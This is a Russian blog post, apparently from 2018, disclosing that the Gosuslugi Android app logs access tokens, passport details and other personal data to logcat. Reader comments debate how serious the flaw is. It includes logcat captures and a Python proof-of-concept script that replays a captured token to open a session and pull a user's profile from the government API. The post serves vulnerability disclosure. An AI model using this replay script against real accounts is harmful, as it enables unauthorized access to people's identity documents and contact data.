Всем доброго времени суток. Все ведь помнят недавний «хайп» вокруг приложения BurgerKing, якобы оно сливает платёжные данные пользователей? Так вот, в этой статье я бы хотел рассказать о гораздо долее масштабном сливе, и не куда-то на 1 сервер а практически всем! За подробностями прошу под кат

С чего всё началось?


А началось всё с баг-репорта по поводу краха мобильного приложения Тинькофф, Я записывал лог падения, чтобы отправить данные разработчикам, а после решил посмотреть логи и других приложений, имеющихся на моём телефоне. Под руку попалось приложение Госуслуги.
Подключаемся через adb к консоли телефона, предварительно включив опцию "Отладка по USB" и запускаем консольную команду logcat.
P.S. Данные указанные в запросах намеренно изменены, все совпадения с реальными людьми чистая случайность.

Далее запускаем приложение Госуслуги и наблюдаем следующую картину:

BaseRequestUri: https://www.gosuslugi.ru/api/cms/v1/disclaimers/mobile
Method: POST, RequestUri: '', Version: 1.1, Content: <null>, Headers:
08-17 14:26:23.863 18730 18730 I mono-stdout: {
08-17 14:26:23.863 18730 18730 I mono-stdout: X-MobileSessionId: 9ae8705c-5140-4630-9087-c1f09843e1a6
08-17 14:26:23.863 18730 18730 I mono-stdout: mobVersion: android_3.3.2.135
08-17 14:26:23.863 18730 18730 I mono-stdout: Cache-Control: no-store, no-cache, max-age=0
08-17 14:26:23.863 18730 18730 I mono-stdout: Pragma: max-age=0,  no-cache,  no-store
08-17 14:26:23.863 18730 18730 I mono-stdout: Accept: application/json, text/json, text/x-json, text/javascript, application/xml, text/xml, application/zip
08-17 14:26:23.863 18730 18730 I mono-stdout: }
Content-Type: application/json; charset=utf-8 
08-17 14:26:23.863 18730 18730 I mono-stdout: Content-Length: 88
RequestBody: {"mnemonics":[{"mnemonic":"SMU_COMMON"}],"userAgent":"android","appVersion":"3.3.2.135"}

В логе полностью отобразился запрос, отправляемый на сервер. Ну, думаю, бывает, забыли убрать при отладке, с кем не бывает. Смотрим дальше и видим ответ:

Response: 6:29.389 18730 18730 I GuRequestLog: 
Uri=https://www.gosuslugi.ru/api/cms/v1/disclaimers/mobile
Content-Type=application/json0 I GuRequestLog: 
Status-Code=OK.389 18730 18730 I GuRequestLog: 
ResponseBody: []89 18730 18730 I GuRequestLog: 

Так, а вот это уже странно! Теперь попробуем ввести код доступа в приложение, и тут нас уже ждёт более интересный результат. Сначала видно как происходит отправка запроса на создание сессии:

BaseRequestUri: https://www.gosuslugi.ru/auth-provider/mobile/v2/createSession
Method: POST, RequestUri: '', Version: 1.1, Content: <null>, Headers:
08-17 14:28:34.609 18730 18730 I GuRequestLog: {
08-17 14:28:34.609 18730 18730 I GuRequestLog: X-MobileSessionId: 9ae8705c-5140-4630-9087-c1f09843e1a6
08-17 14:28:34.609 18730 18730 I GuRequestLog: mobVersion: android_3.3.2.135
08-17 14:28:34.609 18730 18730 I GuRequestLog: Accept: application/json, text/json, text/x-json, text/javascript, application/xml, text/xml, application/zip
08-17 14:28:34.609 18730 18730 I GuRequestLog: }
Content-Type: application/json; charset=utf-8: 
08-17 14:28:34.609 18730 18730 I GuRequestLog: Content-Length: 854
08-17 14:28:34.609 18730 18730 I GuRequestLog: 
RequestBody: {"userId":"84**74555","accessToken":"eyJ2ZXIiOjEsInR5cCI6IkpXVCIsInNidCI6ImFjY2VzcyIsImFsZyI6IlJTMjU2In0.eyJuYmYiOjE1MzQ1MDUwMTcsInNjb3BlIjoiaHR0cDpcL1wvZXNpYS5nb3N1c2x1Z2kucnVcL3Vzcl9pbmY_b2lkPTAwMDAwMDAwMCZtb2RlPXciLCJpc3MiOiJodHRwOlwvXC9lc2lhLmdvc3VzbHVnaS5ydVwvIiwidXJuOmVzaWE6c2lkIjoiMDhlM2M2MDMtMmI1NS0wMDAwLTk0OTMtMDAwMDAwMDAwMDBlIiwidXJuOmVzaWE6c2JqX2lkIjowMDAyMDQwMDAsImV4cCI6MTUzMDUwMDYwMCwiaWF0IjoxNTMwNTA1MDAwLCJjbGllbnRfaWQiOiJQR1UifQ.klq1oftr1t1vaxpagbcdedohu11rm1oplipppwwzyylbcxmfd1jnwgokopdbfak-rxyt1bsdefghrj1lgn1pqrsruvwx1p1bcdeoqwe1k1fyopql1tj1uxzza1cdengqij_l11opzrx_uvwx_za1c11fg111kduqo1frxtu1vxyj-acdebohishh1lopqrstfcwy1zybc1wfnxm1_1m11pq-1s1w-x1za1cdbhvdo_klm-zperqtlovj11ybzref_11wk1mnozqfstwrwxy1auc1e1m1ijhlb-lph1sufvwlyzablcqt1hijkomoo1nrt1mmwxyzfjcde-ghijk","id":"da000000f0002400","name":"_umts","type":"Android"}

Сам запрос отправляется несколько раз, дабы получить более актуальные accessToken и как только токен получен:

Response: 8:35.080 18730 18730 I mono-stdout: 
Uri=https://www.gosuslugi.ru/auth-provider/mobile/v2/createSession
Content-Type=application/json0 I mono-stdout: 
Status-Code=OK.080 18730 18730 I mono-stdout: 
ResponseBody: {"sessionId":"e235d56d-63f3-4b48-a9f6-c1c2d86c25d9","accessToken":"eyJ2ZXIiOjEsInR5cCI6IkpXVCIsInNidCI6ImFjY2VzcyIsImFsZyI6IlJTMjU2In0.eyJuYmYiOjIyNDUsInNjb3BlIjoiaHR0cDpcL1wvZXNpYS5nb3N1c2x1Z2kucnVcL3Vzcl9pbmY_b2lkPTAwMDAwMDAwMCZtb2RlPXciLCJpc3MiOiJodHRwOlwvXC9lc2lhLmdvc3VzbHVnaS5ydVwvIiwidXJuOmVzaWE6c2lkIjoiMDhlM2M2MDMtMmI1NS0wMDAwLTk0OTMtMDAwMDAwMDAwMDBlIiwidXJuOmVzaWE6c2JqX2lkIjowMDAyMDQwMDAsImV4cCI6MTUzMDUwMDYwMCwiaWF0IjoxNTMwNTA1MDAwLCJjbGllbnRfaWQiOiJQR1UifQ.klq1oftr1t1vaxpagbcdedohu11rm1oplipppwwzyylbcxmfd1jnwgokopdbfak-rxyt1bsdefghrj1lgn1pqrsruvwx1p1bcdeoqwe1k1fyopql1tj1uxzza1cdengqij_l11opzrx_uvwx_za1c11fg111kduqo1frxtu1vxyj-acdebohishh1lopqrstfcwy1zybc1wfnxm1_1m11pq-1s1w-x1za1cdbhvdo_klm-zperqtlovj11ybzref_11wk1mnozqfstwrwxy1auc1e1m1ijhlb-lph1sufvwlyzablcqt1hijkomoo1nrt1mmwxyzfjcde-ghijk","error":{"errorCode":"0","errorMessage":"operation completed"}}

Происходит запрос данных о текущем пользователе, и снова всё сыпется в логи:

BaseRequestUri: https://esia.gosuslugi.ru/rs/prns/84**74555
Method: GET, RequestUri: '', Version: 1.1, Content: <null>, Headers:
08-17 14:28:35.960 18730 18730 I GuRequestLog: {
08-17 14:28:35.960 18730 18730 I GuRequestLog: X-MobileSessionId: 9ae8705c-5140-4630-9087-c1f09843e1a6
08-17 14:28:35.960 18730 18730 I GuRequestLog: mobVersion: android_3.3.2.135
08-17 14:28:35.960 18730 18730 I GuRequestLog: Cache-Control: no-cache
08-17 14:28:35.960 18730 18730 I GuRequestLog: If-None-Match: *
08-17 14:28:35.960 18730 18730 I GuRequestLog: Accept: application/json, text/json, text/x-json, text/javascript, application/xml, text/xml, application/zip
08-17 14:28:35.960 18730 18730 I GuRequestLog: Authorization: Bearer eyJ2ZXIiOjEsInR5cCI6IkpXVCIsInNidCI6ImFjY2VzcyIsImFsZyI6IlJTMjU2In0.eyJuYmYiOjIyNDUsInNjb3BlIjoiaHR0cDpcL1wvZXNpYS5nb3N1c2x1Z2kucnVcL3Vzcl9pbmY_b2lkPTAwMDAwMDAwMCZtb2RlPXciLCJpc3MiOiJodHRwOlwvXC9lc2lhLmdvc3VzbHVnaS5ydVwvIiwidXJuOmVzaWE6c2lkIjoiMDhlM2M2MDMtMmI1NS0wMDAwLTk0OTMtMDAwMDAwMDAwMDBlIiwidXJuOmVzaWE6c2JqX2lkIjowMDAyMDQwMDAsImV4cCI6MTUzMDUwMDYwMCwiaWF0IjoxNTMwNTA1MDAwLCJjbGllbnRfaWQiOiJQR1UifQ.klq1oftr1t1vaxpagbcdedohu11rm1oplipppwwzyylbcxmfd1jnwgokopdbfak-rxyt1bsdefghrj1lgn1pqrsruvwx1p1bcdeoqwe1k1fyopql1tj1uxzza1cdengqij_l11opzrx_uvwx_za1c11fg111kduqo1frxtu1vxyj-acdebohishh1lopqrstfcwy1zybc1wfnxm1_1m11pq-1s1w-x1za1cdbhvdo_klm-zperqtlovj11ybzref_11wk1mnozqfstwrwxy1auc1e1m1ijhlb-lph1sufvwlyzablcqt1hijkomoo1nrt1mmwxyzfjcde-ghijk
08-17 14:28:35.960 18730 18730 I GuRequestLog: }

Если отмотать лог ещё немного ниже, можно найти там свои персональные данные, в открытом виде.

Вот так выглядит ответ, содержащий основную информацию о пользователе:

Response: 8:36.940 18730 18730 I GuRequestLog: 
Uri=https://esia.gosuslugi.ru/rs/prns/84**74555
Content-Type=application/json0 I GuRequestLog: 
Status-Code=OK.940 18730 18730 I GuRequestLog: 
ResponseBody: {"stateFacts":["EntityRoot"],"firstName":"Павел","lastName":"Пупкин","middleName":"Васильевич","birthDate":"10.10.1910","birthPlace":"пос. госуслуги, в России","gender":"M","trusted":true,"citizenship":"RUS","snils":"000-000-000 00","inn":"999999999999","updatedOn":1220627522,"status":"REGISTERED","verifying":false,"rIdDoc":88888888,"regCtxCfmSte":"PCD","chosenCfmTypes":["RA"],"regType":"OPR","containsUpCfmCode":false,"eTag":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}

А тут у нас ответ на запрос контактных данных:

Uri=https://esia.gosuslugi.ru/rs/prns/84**74555/ctts
Content-Type=application/json0 I GuRequestLog: 
Status-Code=OK.776 18730 18730 I GuRequestLog: 
ResponseBody: {"stateFacts":["hasSize"],"size":2,"eTag":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA","elements":[{"stateFacts":["Identifiable"],"id":88888888,"type":"EML","vrfStu":"VERIFIED","value":"pupkin_pavel@pochta.ru","eTag":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"},{"stateFacts":["Identifiable"],"id":88888888,"type":"MBT","vrfStu":"VERIFIED","value":"+7(955)5555555","eTag":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}]}

Далее приложение запрашивает с сервера паспортные данные, и благополучно печатает это в лог:

Response: 8:39.520 18730 18730 I GuRequestLog: 
Uri=https://esia.gosuslugi.ru/rs/prns/84**74555/docs
Content-Type=application/json0 I GuRequestLog: 
Status-Code=OK.520 18730 18730 I GuRequestLog: 
ResponseBody: {"stateFacts":["hasSize"],"size":1,"eTag":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA","elements":[{"stateFacts":["Identifiable"],"id":0000000,"type":"RF_PASSPORT","vrfStu":"VERIFIED","series":"2000","number":"000000","issueDate":"00.00.2000","issueId":"000000","issuedBy":"ОТДЕЛЕНИЕМ УФМС РОССИИ","eTag":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}]}

Ну и так далее. Добавили водительское удостоверение, чтобы получать уведомления о штрафах? Пожалуйста, мы выведем в лог на всеобщее обозрение и эту информацию.

Ниже вы можете увидеть PoC, который при нужных параметрах создаёт сессию и возвращает некоторую информацию о пользователе.
#!/usr/bin/python3
import requests
import json
import sys


def createSession(userId, lastToken, rid):
    url = 'https://www.gosuslugi.ru/auth-provider/mobile/v2/createSession'
    header = {
        'X-MobileSessionId': '9ae8705c-5140-4630-9087-c1f09843e1a6',
        'mobVersion': 'android_3.3.2.135',
        'Accept': 'application/json, text/json, text/x-json, text/javascript, application/xml, text/xml, application/zip',
        'Content-Type': 'application/json; charset=utf-8'
    }
    data = {
        "userId": userId,
        "accessToken": lastToken,
        "id": rid,
        "name": "hts",
        "type": "Android"
    }
    resp = requests.post(url, data=json.dumps(data), headers=header)
    return resp.json()


def getUserInfo(userId, session):
    if session['error']['errorCode'] != '0':
        print(session['error']['errorMessage'])
        return
    url = 'https://esia.gosuslugi.ru/rs/prns/%s' % userId
    header = {
        'X-MobileSessionId': session['sessionId'],
        'mobVersion': 'android_3.3.2.135',
        'Cache-Control': 'no-cache',
        'If-None-Match': '*',
        'Accept': 'application/json, text/json, text/x-json, text/javascript, application/xml, text/xml, application/zip',
        'Authorization': 'Bearer %s' % session['accessToken']
    }
    resp = requests.get(url, headers=header)
    if resp.status_code == 200:
        print(json.dumps(resp.json(), indent=4))


def main():
    uid = sys.argv[1]
    lastToken = sys.argv[2]
    rid = sys.argv[3]
    session = createSession(uid, lastToken, rid)
    getUserInfo(uid, session)


if __name__ == '__main__':
    main()

Вместо заключения


Повторюсь, в само приложение никто никак не «вторгался» ни реверса, ни распаковки. Всё что нужно сделать, чтобы получить эту информацию — это запустить утилиту logcat. На момент написания статьи в Play Market не было более новой версии. Данный результат был получен на Android 6.0.1.
P.S. Как оказалось, действительно этот лог доступен только через ADB и непосредственно самому приложению. Но всё равно как мне кажется это не повод выводить туда критическую информацию.


Так что можно не переживать, если конечно у вас на телефоне не активирован root-доступ.

И напоследок! Уж сколько раз твердили миру, чтобы не путали Debug с Release.

Комментарии (9)


  1. cruzo
    17.08.2018 15:46
    +7

    А сообщить в ГосУслуги перед публикацией? Простые смертные же могут пострадать.


  1. argonavtt
    17.08.2018 15:47
    +3

    Здравствуйте, а вы к самим разработчикам обращались?


  1. AChep
    17.08.2018 15:50
    +4

    Но самое интересное, что любому приложению, которое у вас запущено на телефоне, достаточно считать только ваш токен, который отправляется при создании сессии, и всё, в любо момент можно повторить указанные ранее запросы и получить всю информацию о вас. И никаких уведомлений, о том, что в ваш личный кабинет был совершён вход, вы не увидите.


    Любому приложению с предоставлеными root-правами, т.к. прочитать логи без них нельзя. С версии, примерно, Android 4.1.

    А у приложения с root-правами и так достаточно способов мониторить трафик.


    1. mopsicus
      17.08.2018 16:16

      Это понятно, но не сильно успокаивает :) Всё равно ж косяк разработчиков, такое нельзя в лог выводить.


      1. AChep
        17.08.2018 16:26

        Нельзя, но из обычных вариантов использования данные могут утечь через ADB + зараженный компьютер или если вы сами свои логи записали (например падение в логах какого-то приложения) и кому-то отправили забыв стереть лишнее.

        Ну или если есть поддержка 4.0.х или ниже.


        1. CheY
          17.08.2018 16:31
          +2

          Поддержки нет, minSdk 16. Вектор атаки через настроенный adb + разрешённую связь с пк + вирус на компьютере крайне нереалистичен. Примерно на уровне «если у пользователя рутованное устройство».
          Поэтому нет, к сожалению (или счастью), на серьёзную уязвимость и утечку не тянет. Просто недосмотр разработчиков. Потенциально можно вниматеьно изучить их АПИ благодаря этому и может выцепить проблему с ограничениями прав… Например, прогнать какой-нибудь ID-шник. Но это можно сделать и без логов.


  1. OKyJIucT
    17.08.2018 16:21
    +4

    Тю, я думал, тут уже всю базу госуслуг выкачали («ссылка на архив в конце статьи»), понадеялся на очередное разоблачение :(

    А на деле, чтобы воспользоваться этой «уязвимостью», необходимо не только иметь на удаленном устройстве юзера, инфу которого мы хотим получить, приложение госуслуг, но и подконтрольное нам приложение для чтения логов. И, как выше уже сообщили, предоставить последнему root-права.

    Кажется мне, что люди, которые знают, что такое root и как его получить, вряд ли будут бездумно какому попало приложению предоставлять такой доступ.


  1. klim76
    17.08.2018 16:49

    документируйте API. Пишите свои ГосУслуги с блек джеком и логами


  1. Vsevo10d
    17.08.2018 17:03
    +1

    Все ведь помнят недавний «хайп» вокруг приложения BurgerKing, якобы оно сливает платёжные данные пользователей?

    А теперь я раздую такой же с госуслугами! Фффффффф ффффффффф фффффффффффф фффффф